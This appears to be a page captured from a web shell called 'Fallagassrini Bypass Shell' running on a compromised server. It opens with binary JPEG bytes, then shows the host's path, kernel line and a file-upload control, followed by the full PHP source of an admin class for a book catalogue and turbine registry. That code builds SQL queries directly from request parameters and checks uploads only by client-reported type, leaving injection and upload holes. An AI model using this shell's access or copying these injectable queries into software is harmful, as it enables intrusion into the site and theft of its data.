JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/admin/includes/classes/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/admin/includes/classes/class.BookItem.php

<?php
#####Class For Adding Content Management ######
class BookItem extends MysqlFns{
 
 /* class constructor */
 function BookItem(){
 $this->LDDisplayPath= $config['SiteGlobalPath']."class.BookItem.php";
  global $config;
  global $objSmarty;
  $this->MysqlFns();
  $this->Limit = 15;

   $SelQuery	= 'SELECT max(sl_no) as last FROM `images` Limit 0,1';
 //  echo $SelQuery;
   $DevDetail	= $this->ExecuteQuery($SelQuery, 'select');
 //  	echo $DevDetail[0]['last'];
   $DevDetail[0]['isbn'] = stripslashes($DevDetail[0]['last']);
  	$m_c1 = preg_replace("/[^0-9\.]/", '', $DevDetail[0]['sl_no']);
	$m_c1= $m_c1 + 1;
	$str = str_split($DevDetail[0]['last'], 1);
	$m_c = $str[0]. "" .$m_c1;
   $objSmarty->assign('m_c', $m_c);
   
    $f1 = "authorname.txt";
			$uploadpath = $config['QuotePath'];
			chmod($uploadpath.$f1,"0755");
			$myfile = fopen($f1, "w") or die("Unable to open file!");
	 //$SelQuery2	= 'SELECT DISTINCT(author) FROM `book` WHERE is_status="1" ';
		   $SelQuery2	= 'SELECT DISTINCT(author) FROM `book` WHERE is_status="1" AND author REGEXP  "^[A-z0-9]+$" ';
		  //$SelQuery2	= 'SELECT DISTINCT(author) FROM `book` WHERE is_status="1" AND author= Cast(author AS VARCHAR)';
		//echo  $SelQuery2	= 'SELECT DISTINCT(author) FROM `book` WHERE is_status="1" AND author LIKE  "'.$_POST['authorName'].'" ';
			$MatList	= $this->ExecuteQuery($SelQuery2, 'select');
			//print_r($MatList);exit;
			if(!empty($MatList) && is_array($MatList))
			foreach($MatList as $key=>$value)
			{
			$MatList[$key]['Aname'] = stripslashes($MatList[$key]['author']);
			$names1 = $names1.$MatList[$key]['Aname'].",";
			ini_set('memory_limit', '-1');
			}
			fwrite($myfile, $names1);
			fclose($myfile);
 }



 function GetMaterialDetails($objArray='')  
	{
		global $objSmarty;
		$SelQuery = 'SELECT * FROM `images` WHERE isbn ="'.$_GET['isbn'].'"' ;
		$PageList3		= $this->ExecuteQuery($SelQuery, "select");
        $objSmarty->assign('PageList3', $PageList3);
	}	
	/*function DeleteID($id)
	{
  		global $objSmarty;
  		$DelQuery = 'update  `images` set `record_status` = 0 WHERE `isbn`="'.$_GET['isbn'].'" '; 
  		$this->ExecuteQuery($DelQuery, 'delete');
  		$objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
 	}*/
/*function GetMaterialDetails($objArray='')  {
		global $objSmarty;
		$objSmarty->assign('tur_id',$_GET['tur_id']);
		$SelQuery = 'SELECT * FROM `images`WHERE isbn ="'.$_GET['isbn'].'"' ;
		//echo $SelQuery;
		$LDList		= $this->ExecuteQuery($SelQuery, "select");
		$total_records = count($LDList);
		$record_per_page = $this->Limit;
		
		$objSmarty->assign("TList1",$_GET['tur_id']);
		//$LDList[0]['title'] 		= stripslashes($LDList[0]['title']);
	//	$LDList[1]['txttitle'] 		= stripslashes($LDList[1]['txttitle']);
	//	$LDList[2]['image'] 		= stripslashes($LDList[2]['image']);
		 if(!empty($LDList) && is_array($LDList))
		{
			$objSmarty->assign("LDList2",$LDList);
			$objSmarty->assign("LDDisp", $this->LDDisplayPath);
			return $LDList2;
		}
		else{
			return false;
		}
		$objPage->set_page_data($_SERVER['PHP_SELF'],$total_records,$record_per_page,$scroll,true,true,true);
		$listing_split = new MsplitPageResults($SelQuery, $this->Limit);
		
		if ( ($listing_split->number_of_rows > 0) )  
		{
			$objSmarty->assign('LinkPage',$listing_split->display_count(TEXT_DISPLAY_NUMBER_OF_RESULT));
			$objSmarty->assign('PerPageNavigation',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
			$PageList = $this->ExecuteQuery($listing_split->SelQuery, 'selectassoc');
		}
		if(!empty($PageList) && is_array($PageList))
			foreach($PageList as $key=>$value)
			{
				$PageList[$key]['Title'] = stripslashes($PageList[$key]['turbine_id']);
				$PageList[$key]['Image'] = stripslashes($PageList[$key]['turbine_name']);
				$objSmarty->assign('Title',$PageList[$key]['tur_id']);
				$objSmarty->assign('Image',$PageList[$key]['turbine_name']);
			}		
			$objSmarty->assign('i', $listing_split->i);
			$objSmarty->assign('PageList', $PageList);
			echo $PageList;
			return $PageList;
	}	*/

 //Create FCK Editor
 function CreateFCKeditor($value = ''){
  global $config, $objSmarty;

  include($config['FckEditorPath'] . '/fckeditor.php');
  $sBasePath = $config['SiteFCKEditorBasePath'];

  $oFCKeditor 			= new FCKeditor('content') ;
  $oFCKeditor->BasePath	= $sBasePath ;
  $oFCKeditor->Width		= 600 ;
  $oFCKeditor->Height		= 450 ;
  $oFCKeditor->Value		= $value;
  $objSmarty->assign('Editor', $oFCKeditor->Create());
 }
  function GetBooksList($objArray='')  
	{
		global $objSmarty;
		$SelQuery51 = 'SELECT * FROM `book` WHERE is_status="1" AND image="" AND new_book_alert ="1" ORDER BY id DESC Limit 0,100' ;
		//$SelQuery51 = 'SELECT *,br.book_id,b.book_name FROM `book_receipt` br LEFT JOIN `book` b on br.book_id =b.id WHERE b.is_status="1" AND b.image="" Limit 0,50 ';
		$PageBookList		= $this->ExecuteQuery($SelQuery51, "select");
        $objSmarty->assign('PageBookList', $PageBookList);
	}	
 function SearchBook()
	{
	global $objSmarty;
		$SelQuery51 = 'SELECT * FROM `book` WHERE is_status="1" AND image="" AND (book_name LIKE "%'.$_POST['book'].'%" OR author LIKE "%'.$_POST['book'].'%" OR isbn LIKE "'.$_POST['book'].'%")' ;
	//$SelQuery51 = 'SELECT *,br.book_id,b.book_name FROM `book_receipt` br LEFT JOIN `book` b on br.book_id =b.id WHERE b.is_status="1" AND b.image="" AND (b.book_name LIKE "'.$_POST['book'].'%" OR b.author LIKE "'.$_POST['book'].'%" OR b.isbn LIKE "'.$_POST['book'].'%") Limit 0,50 ';
		$PageBookList		= $this->ExecuteQuery($SelQuery51, "select");
        $objSmarty->assign('PageBookList', $PageBookList);
	}
	function EditBook()
	{
	global $objSmarty;
		$SelQuery51 = 'SELECT * FROM `book` WHERE is_status="1" AND (book_name LIKE "%'.$_POST['book2'].'%" OR author LIKE "%'.$_POST['book2'].'%" OR isbn LIKE "'.$_POST['book2'].'%")' ;
	/*$SelQuery51 = 'SELECT *,br.book_id,b.book_name FROM `book_receipt` br LEFT JOIN `book` b on br.book_id =b.id WHERE b.is_status="1" AND b.image="" AND (b.book_name LIKE "'.$_POST['book'].'%" OR b.author LIKE "'.$_POST['book'].'%" OR b.isbn LIKE "'.$_POST['book'].'%") Limit 0,50 ';*/
		$PageBookList		= $this->ExecuteQuery($SelQuery51, "select");
        $objSmarty->assign('PageBookList', $PageBookList);
	}
 /************************************Material Details/********************************************/

function AjaxGetBookDetails()
 {
global $objSmarty,$config;
$tbl = $config['DBPrefix'];

    $f2 = "bookname.txt";
			$uploadpath = $config['QuotePath'];
			chmod($uploadpath.$f1,"0755");
			$bookfile = fopen($f2, "w") or die("Unable to open file!");
			$SelQuery3	= 'SELECT DISTINCT(book_name) FROM `book` WHERE author="'.$_GET['authorName'].'"';
			$BookList	= $this->ExecuteQuery($SelQuery3, 'select');
			//print_r($BookList);
			if(!empty($BookList) && is_array($BookList))
			foreach($BookList as $key=>$value)
			{
			$BookList[$key]['Bname'] = stripslashes($BookList[$key]['book_name']);
			$bname = $bname.$BookList[$key]['Bname'].",";
			}
			fwrite($bookfile, $bname);
			fclose($bookfile);
 }



 /* Get the Static Content list */
 function GetMaterialLists($objArray='')  {
  global $objSmarty;
  $this->Limit = 3351;
  $whereClause = 'WHERE status =1';
  if($_POST['search'] == ''){
  			if($_POST['materialCode'])
	   			$whereClause = ' WHERE (`isbn` like "%'.$_POST['materialCode'].'%") AND `status` =1 ';
	   		elseif($_POST['book_name'])
	   			$whereClause = ' WHERE (`m_name` like "%'.$_POST['book_name'].'%") AND `status` =1 ';
			elseif($_POST['materialType'])
				$whereClause = ' WHERE (`m_type` like "%'.$_POST['materialType'].'%") AND `status` =1';
			elseif($_POST['materialCategory'])
				$whereClause = ' WHERE (`m_cat` like "%'.$_POST['materialCategory'].'%") AND `status` =1 ';
			elseif($_POST['price'])
				$whereClause = ' WHERE (`price` like "%'.$_POST['price'].'%") AND `status` =1 ';
			elseif($_POST['isBn'])
				$whereClause = ' WHERE (`description` like "%'.$_POST['isBn'].'%") AND `status` =1 ';
			elseif($_POST['date'])
				$whereClause = ' WHERE (`doe` like "%'.$_POST['date'].'%") AND `status` =1 ';
			elseif($_POST['status'])
				$whereClause = ' WHERE (`status` like "%'.$_POST['status'].'%") AND `status` =1 ';
   
   $objSmarty->assign('isbn',$_POST['materialCode']);
   $objSmarty->assign('m_name',$_POST['book_name']);
   $objSmarty->assign('m_type',$_POST['materialType']);
   $objSmarty->assign('m_cat',$_POST['materialCategory']);
   $objSmarty->assign('price',$_POST['price']);
   $objSmarty->assign('description',$_POST['isBn']);
   $objSmarty->assign('doe',$_POST['date']);
   $objSmarty->assign('status',$_POST['status']);
  }
  $SelQuery		= 'SELECT * FROM `images`'.$whereClause.' ORDER BY isbn ASC';
  $listing_split = new MsplitPageResults($SelQuery, $this->Limit);
  if ( ($listing_split->number_of_rows > 0) )  {
   $objSmarty->assign('LinkPage',$listing_split->display_count(TEXT_DISPLAY_NUMBER_OF_RESULT));
   $objSmarty->assign('PerPageNavigation',TEXT_RESULT_PAGE1 . ' ' . $listing_split->display_links_submit($this->Limit, get_all_get_params(array('page', 'info', 'x', 'y')))); 
   $PageList = $this->ExecuteQuery($listing_split->sql_query, 'selectassoc');
  }
  if(!empty($PageList) && is_array($PageList))
  {
   foreach($PageList as $key=>$value){
    $PageList[$key]['Mcd'] = stripslashes($PageList[$key]['isbn']);
	$PageList[$key]['Mname'] = stripslashes($PageList[$key]['m_name']);
	$PageList[$key]['Mtype'] = stripslashes($PageList[$key]['m_type']);
	$PageList[$key]['Mcat'] = stripslashes($PageList[$key]['m_cat']);
	$PageList[$key]['MPrice'] = stripslashes($PageList[$key]['price']);
	$PageList[$key]['MDesc'] = stripslashes($PageList[$key]['description']);
	$PageList[$key]['MDate'] = stripslashes($PageList[$key]['doe']);
	$PageList[$key]['MStatus'] = stripslashes($PageList[$key]['status']);
	}
  $objSmarty->assign('i', $listing_split->i);
  $objSmarty->assign('PageList', $PageList);
 // print_r($PageList);exit;
  return $PageList;
  }
  elseif(empty($PageList) && is_array($PageList))
    $objSmarty->assign('ErrorMessage', 'No Records Found');
 }
 /* Delete the Static Page */
 function DeleteDev($DevIdent){
  global $objSmarty;
  foreach ( $DevIdent as $ConId ){
   if($ConId){
    $DelQuery = 'DELETE FROM `arka_turbine_reg_master` WHERE `id` ='.$ConId;
	$this->ExecuteQuery($DelQuery, 'delete');
   }
  }
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  return true;
 }
 /* Insert the content for  Static Pages */
 function InsertBook($objArray,$objFiles){
	global $objSmarty,$config;
		list ($name,$format) = split("[.]", $objFiles['image']['name'],2);
		$uploadpath = $config['bookImagePath'];

				if($objFiles['image']["name"] <> "")
		{
			    $errors     = array();
   				$maxsize    = 5242880;
   				$acceptable = array(
				'image/jpeg','image/jpg','image/gif','image/png','application/pdf','text/plain','application/msword','application/vnd.openxmlformats-officedocument.presentationml.presentation','application/vnd.openxmlformats-officedocument.wordprocessingml.document',
				'application/x-zip-compressed','application/vnd.ms-excel','application/vnd.ms-powerpoint','video/pps','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
		if(($_FILES['image']['size'] >= $maxsize) || ($_FILES["image"]["size"] == 0)) {
		$errors[] = 'File --1-- too large. File must be less than 2 megabytes';
		}
		
		if((!in_array($_FILES['image']['type'], $acceptable)) && (!empty($_FILES["image"]["type"])))
		 {
		$errors1[] = 'File --1-- Only PDF, JPG, JPEG, TXT, DOC, DOCX, XLS, XLSX, ZIP, PPT, PPTX, GIF and PNG types are accepted';
		}
		
		if(count($errors)  === 0 && count($errors1)  === 0) 
		{
			if((!file_exists($config['bookImagePath'] . $_FILES["image"]["name"])))
			{	$time = date("Y_m_d_H_i_s");
				$f1 = $objFiles['image']['name'];
				$f1 = $time.'_'.$f1;
				
				if(move_uploaded_file($objFiles['image']['tmp_name'], $uploadpath.$f1))
				//echo ($uploadpath.$f1);exit;
				chmod($uploadpath.$f1,"0511");
			}
		   } 
		  
			else {
        	foreach($errors as $error) 
			{
            $objSmarty->assign('ErrorMessage', $error);
				//$url_addtnal_data=base64_encode($error);
				//header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
				return false;			
        }
		foreach($errors1 as $error1) 
			{
            $objSmarty->assign('ErrorMessage', $error1);
				//$url_addtnal_data=base64_encode($error);
				//header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
				return false;						
        }
		
		}
	}

  /* if(!$objArray['authorName']){
    $objSmarty->assign('ErrorMessage', 'Author Name should not be blank');
	return false;
   }elseif(!$objArray['book_name']){
    $objSmarty->assign('ErrorMessage', 'Book Name should not be blank');
	return false;
   }elseif(!$objArray['isBn']){
    $objSmarty->assign('ErrorMessage', 'ISBN should not be blank');
	return false;
   }elseif(!$objFiles['image']){
    $objSmarty->assign('ErrorMessage', 'BookImage should not be blank');
	return false;
   }*/
   //*************************** Insert Turbine Reg Master *********************************************
   if($objArray['name'] && $objArray['isbn']){    
  /* $InsQuery = 'INSERT INTO `images` (`author_name`,`book_name`, `isbn`, `image`,`description`,`status`) VALUES("'.trim(addslashes($objArray['authorName'])).'","'.trim(addslashes($objArray['book_name'])).'","'.trim(addslashes($objArray['isBn'])).'","'.$f1.'","'.trim(addslashes($objArray['description'])).'","1")';
	$this->ExecuteQuery($InsQuery, 'insert');*/
	 $SelQuery = 'UPDATE `book` set image = "'.$f1.'" ,description="'.trim(addslashes($objArray['desc'])).'",rating="'.trim(addslashes($objArray['rating'])).'" WHERE id = "'.$_GET['book_id'].'" AND author = "'.$_GET['author'].'" AND isbn = "'.$_GET['isbn'].'" ';
   $DList = $this->ExecuteQuery($SelQuery, "update");
	//$objSmarty->assign('SuccessMessage',"Book Image Uploaded Successfully");
    $url_addtnal_data=base64_encode("Book Image Uploaded Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
  }
  /*else{
   
    $url_addtnal_data=base64_encode("Material Code Already Exists");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
   //PrePopulate($objArray, 'DevDetail');
  }*/
 }
 
 /* Insert the content for  Recommended Book Image Pages */
 function InsertRecBook($objArray,$objFiles){

	global $objSmarty,$config;
  if($this->ChkDupliMat(($objArray))){
		list ($name,$format) = split("[.]", $objFiles['image']['name'],2);
		$uploadpath = $config['recommendedImagePath'];

				if($objFiles['image']["name"] <> "")
		{
			    $errors     = array();
   				$maxsize    = 5242880;
   				$acceptable = array(
				'image/jpeg','image/jpg','image/gif','image/png','application/pdf','text/plain','application/msword','application/vnd.openxmlformats-officedocument.presentationml.presentation','application/vnd.openxmlformats-officedocument.wordprocessingml.document',
				'application/x-zip-compressed','application/vnd.ms-excel','application/vnd.ms-powerpoint','video/pps','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet');
		if(($_FILES['image']['size'] >= $maxsize) || ($_FILES["image"]["size"] == 0)) {
		$errors[] = 'File --1-- too large. File must be less than 2 megabytes';
		}
		
		if((!in_array($_FILES['image']['type'], $acceptable)) && (!empty($_FILES["image"]["type"])))
		 {
		$errors1[] = 'File --1-- Only PDF, JPG, JPEG, TXT, DOC, DOCX, XLS, XLSX, ZIP, PPT, PPTX, GIF and PNG types are accepted';
		}
		
		if(count($errors)  === 0 && count($errors1)  === 0) 
		{
			if((!file_exists($config['recommendedImagePath'] . $_FILES["image"]["name"])))
			{	$time = date("Y_m_d_H_i_s");
				$f1 = $objFiles['image']['name'];
				$f1 = $time.'_'.$f1;
				
				if(move_uploaded_file($objFiles['image']['tmp_name'], $uploadpath.$f1))
				//echo ($uploadpath.$f1);exit;
				chmod($uploadpath.$f1,"0511");
			}
		   } 
		  
			else {
        	foreach($errors as $error) 
			{
            $objSmarty->assign('ErrorMessage', $error);
				//$url_addtnal_data=base64_encode($error);
				//header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
				return false;			
        }
		foreach($errors1 as $error1) 
			{
            $objSmarty->assign('ErrorMessage', $error1);
				//$url_addtnal_data=base64_encode($error);
				//header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
				return false;						
        }
		
		}
	}
    if(!$objFiles['image']){
    $objSmarty->assign('ErrorMessage', 'BookImage should not be blank');
	return false;
   }
   //*************************** Insert Turbine Reg Master *********************************************
   if($objFiles['image'] != ""){    
  
    $InsQuery = 'INSERT INTO `recommended_books` (`image`,`status`) VALUES("'.$f1.'","1")';
	$this->ExecuteQuery($InsQuery, 'insert');
	
	//$objSmarty->assign('SuccessMessage',"Book Image Uploaded Successfully");
    $url_addtnal_data=base64_encode("Recommended Book Image Uploaded Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
  }
  }
  else{
   
    $url_addtnal_data=base64_encode("Material Code Already Exists");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
   //PrePopulate($objArray, 'DevDetail');
  }
 }
 
 /* Edit the Static Page */
 function EditMaterial($objArray){
  global $objSmarty,$_REQUEST,$_FILES,$_POST;
  //$DevIdent=$_REQUEST['t_id'];
 
  	list ($name,$format) = split("[.]", $objFiles['bookImage']['name'],2);
	
		$uploadpath = $config['recommendedImagePath']; 
		if($objFiles['bookImage']["name"] <> "")
		{	
			if((!file_exists($config['recommendedImagePath'] . $_FILES["bookImage"]["name"])))
			{  
				$f1 = $objFiles['bookImage']['name'];
				if(move_uploaded_file($objFiles['bookImage']['tmp_name'], $uploadpath.$f1))
				chmod($uploadpath.$f1,"0511");
			}
			elseif((file_exists($config['recommendedImagePath'] . $_FILES["bookImage"]["name"]))) 
			{
				$f1 = explode(".", $_FILES['bookImage']['name']);
				$newfilename = round(microtime(true)) . '.' . end($f1);
				if(move_uploaded_file($objFiles['bookImage']['tmp_name'], $uploadpath.$newfilename))
				chmod($uploadpath.$newfilename,"0511");
				$f1=$newfilename;
			}
		}  
   if(!$objArray['materialType']){
		 $objSmarty->assign('ErrorMessage', 'Material Type should not be blank');
	return false;
   }elseif(!$objArray['materialCategory']){
    $objSmarty->assign('ErrorMessage', 'Material Category should not be blank');
	return false;
   }elseif(!$objArray['date']){
    $objSmarty->assign('ErrorMessage', 'Date should not be blank');
	return false;
   }elseif(!$objArray['materialCode']){
    $objSmarty->assign('ErrorMessage', 'Material Code should not be blank');
	return false;
   }elseif(!$objArray['book_name']){
    $objSmarty->assign('ErrorMessage', 'Material Name should not be blank');
	return false;
   }elseif(!$objArray['isBn']){
    $objSmarty->assign('ErrorMessage', 'Description should not be blank');
	return false;
   }

	   if($objArray['materialCode'] && $objArray['materialType']  && $objArray['book_name']){
	echo	$UpQuery = 'UPDATE `images` SET `isbn` = "'.trim(addslashes($objArray['materialCode'])).'", `m_name` = "'.trim(addslashes($objArray['book_name'])).'", `m_cat` = "'.trim(addslashes($objArray['materialCategory'])).'", `m_type` = "'.trim(addslashes($objArray['materialType'])).'",`price` = "'.trim(addslashes($objArray['price'])).'", `description` = "'.trim(addslashes($objArray['isBn'])).'" WHERE `isbn` ="'.trim(addslashes($_GET['isbn'])).'"';
		$this->ExecuteQuery($UpQuery, 'update');

    $url_addtnal_data=base64_encode("Material Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&isbn=".$objArray['materialCode']);

		return true;

	   }

 
 }
 
 /* Insert the Turbine Payments */
 function InsertTurbinePayment($objArray){
  global $objSmarty;
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  if($this->ChkDupliDeve(trim(addslashes($objArray['d_id'])))){
   if(!$objArray['d_id']){
    $objSmarty->assign('ErrorMessage', 'Turbine ID should not be blank');
	return false;
   }elseif(!$objArray['d_type']){
    $objSmarty->assign('ErrorMessage', 'Turbine Type should not be blank');
	return false;
   }elseif(!$objArray['d_name']){
    $objSmarty->assign('ErrorMessage', 'Turbine Name should not be blank');
	return false;
   }elseif(!$objArray['d_s_no']){
    $objSmarty->assign('ErrorMessage', 'Serial No should not be blank');
	return false;
   }elseif(!$objArray['dept']){
    $objSmarty->assign('ErrorMessage', 'Department Name should not be blank');
	return false;
   }elseif(!$objArray['v_name']){
    $objSmarty->assign('ErrorMessage', 'Vendor Name should not be blank');
	return false;
   }elseif(!$objArray['v_contact']){
    $objSmarty->assign('ErrorMessage', 'Vendor Contact should not be blank');
	return false;
   }elseif(!$objArray['support_type_name']){
    $objSmarty->assign('ErrorMessage', 'Support Type should not be blank');
	return false;
   }elseif(!$objArray['t_model']){
    $objSmarty->assign('ErrorMessage', 'Type Model should not be blank');
	return false;
   }elseif(!$objArray['service_plan_name']){
    $objSmarty->assign('ErrorMessage', 'Service Plan should not be blank');
	return false;
   }elseif(!$objArray['price']){
    $objSmarty->assign('ErrorMessage', 'Price should not be blank');
	return false;
   }elseif(!$objArray['st_date']){
    $objSmarty->assign('ErrorMessage', 'Start Date should not be blank');
	return false;
   }elseif(!$objArray['end_dt']){
    $objSmarty->assign('ErrorMessage', 'End Date should not be blank');
	return false;
   }elseif(!$objArray['years']){
    $objSmarty->assign('ErrorMessage', 'Years should not be blank');
	return false;
   }elseif(!$objArray['cusid']){
    $objSmarty->assign('ErrorMessage', 'Customer ID should not be blank');
	return false;
   }elseif(!$objArray['cname']){
    $objSmarty->assign('ErrorMessage', 'Customer Name should not be blank');
	return false;
   }elseif(!$objArray['c_person']){
    $objSmarty->assign('ErrorMessage', 'Contact Person should not be blank');
	return false;
   }elseif(!$objArray['c_type']){
    $objSmarty->assign('ErrorMessage', 'Customer Type should not be blank');
	return false;
   }
   $objSmarty->assign('d_id', $objArray['d_id']);
   //*************************** Insert Turbine Reg Master *********************************************
   if($objArray['d_id'] && $objArray['d_type'] && $objArray['d_name']){
   $InsQuery = 'INSERT INTO `arka_device_reg_master`(`device_id`, `device_type`, `device_name`, `device_serial_no`, `department`, `vendor_name`, `vendor_contact`, `support_type`, `type_model`, `service_plan`, `price`, `entitlement`, `start_date`, `renewed_date`, `end_date`, `no_of_years`, `additional_support`, `customer_id`, `customer_name`, `contact_person`, `customer_type`) VALUES("'.trim(addslashes($objArray['d_id'])).'","'.trim(addslashes($objArray['d_type'])).'","'.trim(addslashes($objArray['d_name'])).'","'.trim(addslashes($objArray['d_s_no'])).'","'.trim(addslashes($objArray['dept'])).'","'.trim(addslashes($objArray['v_name'])).'","'.trim(addslashes($objArray['v_contact'])).'","'.trim(addslashes($objArray['support_type_name'])).'","'.trim(addslashes($objArray['t_model'])).'","'.trim(addslashes($objArray['service_plan_name'])).'","'.trim(addslashes($objArray['price'])).'","'.trim(addslashes($objArray['entitlement'])).'","'.trim(addslashes($objArray['st_date'])).'","'.trim(addslashes($objArray['st_date'])).'","'.trim(addslashes($objArray['end_dt'])).'","'.trim(addslashes($objArray['years'])).'","'.trim(addslashes($objArray['add_support'])).'","'.trim(addslashes($objArray['cusid'])).'","'.trim(addslashes($objArray['cname'])).'","'.trim(addslashes($objArray['c_person'])).'","'.trim(addslashes($objArray['c_type'])).'")';
	$this->ExecuteQuery($InsQuery, 'insert');
	$this->TurbineItem();
	   //***************************Insert Turbine Payment details *********************************************
	$InsQuery2 = 'INSERT INTO `arka_dev_payment_details`(`device_id`, `service_plan`, `price`, `amt_due`, `d_payment_amt`, `d_payment_status`) VALUES("'.trim(addslashes($objArray['d_id'])).'","'.trim(addslashes($objArray['service_plan_name'])).'","'.trim(addslashes($objArray['price'])).'","'.trim(addslashes($objArray['price'])).'","0","Pending")';
	$this->ExecuteQuery($InsQuery2, 'insert');
	
	   //***************************Select Entitlement *********************************************
	   $SelQuery2	= 'SELECT entitled FROM `arka_cus_entitle_status` WHERE customer_id = "'.trim(addslashes($objArray['cusid'])).'" Limit 0,1';
	   $EntDetail	= $this->ExecuteQuery($SelQuery2, 'select');
	   $ent = stripslashes($EntDetail[0]['entitled']);
	   $ent= $ent + ($objArray['entitlement']);
	   $objSmarty->assign('ent', $ent);
	   
	   $UpQuery3 = 'UPDATE `arka_cus_entitle_status` SET `entitled` = "'.$ent.'" WHERE `customer_id` ="'.trim(addslashes($objArray['cusid'])).'"';
		$this->ExecuteQuery($UpQuery3, 'update');
	
	//***************************Customer Payment Details *********************************************
	   $SelQuery3	= 'SELECT * FROM `arka_cus_payment_details` WHERE customer_id = "'.trim(addslashes($objArray['cusid'])).'" Limit 0,1';
	   $PayDetail	= $this->ExecuteQuery($SelQuery3, 'select');
	   $nod = stripslashes($PayDetail[0]['no_of_device']);
	   $nod= $nod + 1;
	   $t_amt = stripslashes($PayDetail[0]['total_amt']);
	   $t_amt= $t_amt + ($objArray['price']);
	   $t_amt_due = stripslashes($PayDetail[0]['tot_amt_due']);
	   $t_amt_due= $t_amt_due + ($objArray['price']);
	   
	   $objSmarty->assign('nod', $nod);
	   $objSmarty->assign('t_amt', $t_tmt);
	   $objSmarty->assign('t_amt_due', $t_amt_due);
	   
	   $UpQuery4 = 'UPDATE `arka_cus_payment_details` SET `no_of_device` = "'.$nod.'",`total_amt` = "'.$t_amt.'",`tot_amt_due` = "'.$t_amt_due.'",`payment_status` = "'.$t_amt_due.'" WHERE `customer_id` ="'.trim(addslashes($objArray['cusid'])).'"';
		$this->ExecuteQuery($UpQuery4, 'update');
	
	
	$objSmarty->assign('Dd_id',$objArray['d_id']);
	$oFCKeditor->Value		= '';
	$objSmarty->assign('d_id', '');
	$objSmarty->assign('SuccessMessage', 'New Turbine Added Successfully');
	//PrePopulate($objArray, 'DevDetail');
   }
  }
  else{
   $objSmarty->assign('d_id', $objArray['d_id']);
   $objSmarty->assign('ErrorMessage', 'Turbine ID Already Exists');
   PrePopulate($objArray, 'DevDetail');
  }
 }
 
 /* Display the Static Page */
 function GetTurbineById(){
  global $objSmarty;
/*  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);*/
  $SelQuery		= 'SELECT max(device_id) FROM `arka_device_reg_master` Limit 0,1';
  $DevDetail		= $this->ExecuteQuery($SelQuery, 'select');
  $DevDetail[0]['device_id'] = stripslashes($DevDetail[0]['device_detail']);
  $objSmarty->assign('hdevice_id', stripslashes($DevDetail[0]['device_id']));
  $val = intval(substr($DevDetail[0]['device_id'],0,4), 5);
  $objSmarty->assign('d_id', $DevDetail[0]['device_id']);
 /* 
  $DevDetail[0]['type'] = stripslashes($DevDetail[0]['type']);
  $objSmarty->assign('type', $DevDetail[0]['type']);
  
  $DevDetail[0]['model'] = stripslashes($DevDetail[0]['model']);
  $objSmarty->assign('model', $DevDetail[0]['model']);
  
  $DevDetail[0]['txttitle'] = stripslashes($DevDetail[0]['txttitle']);
  $objSmarty->assign('txttitle', $DevDetail[0]['txttitle']);
  
  $DevDetail[0]['image'] = stripslashes($DevDetail[0]['image']);
  $objSmarty->assign('image', $DevDetail[0]['image']);
  
  $DevDetail[0]['image_view'] = stripslashes($DevDetail[0]['image_view']);
  $objSmarty->assign('image_view', $DevDetail[0]['image_view']);
  
  $DevDetail[0]['image_model1'] = stripslashes($DevDetail[0]['image_model1']);
  $objSmarty->assign('image_model1', $DevDetail[0]['image_model1']);
  
   $DevDetail[0]['image_model2'] = stripslashes($DevDetail[0]['image_model2']);
  $objSmarty->assign('image_model2', $DevDetail[0]['image_model2']);
  
   $DevDetail[0]['image_model3'] = stripslashes($DevDetail[0]['image_model3']);
  $objSmarty->assign('image_model3', $DevDetail[0]['image_model3']);
  
  $DevDetail[0]['content'] = stripslashes($DevDetail[0]['content']);
  $oFCKeditor->Value = $DevDetail[0]['content'];
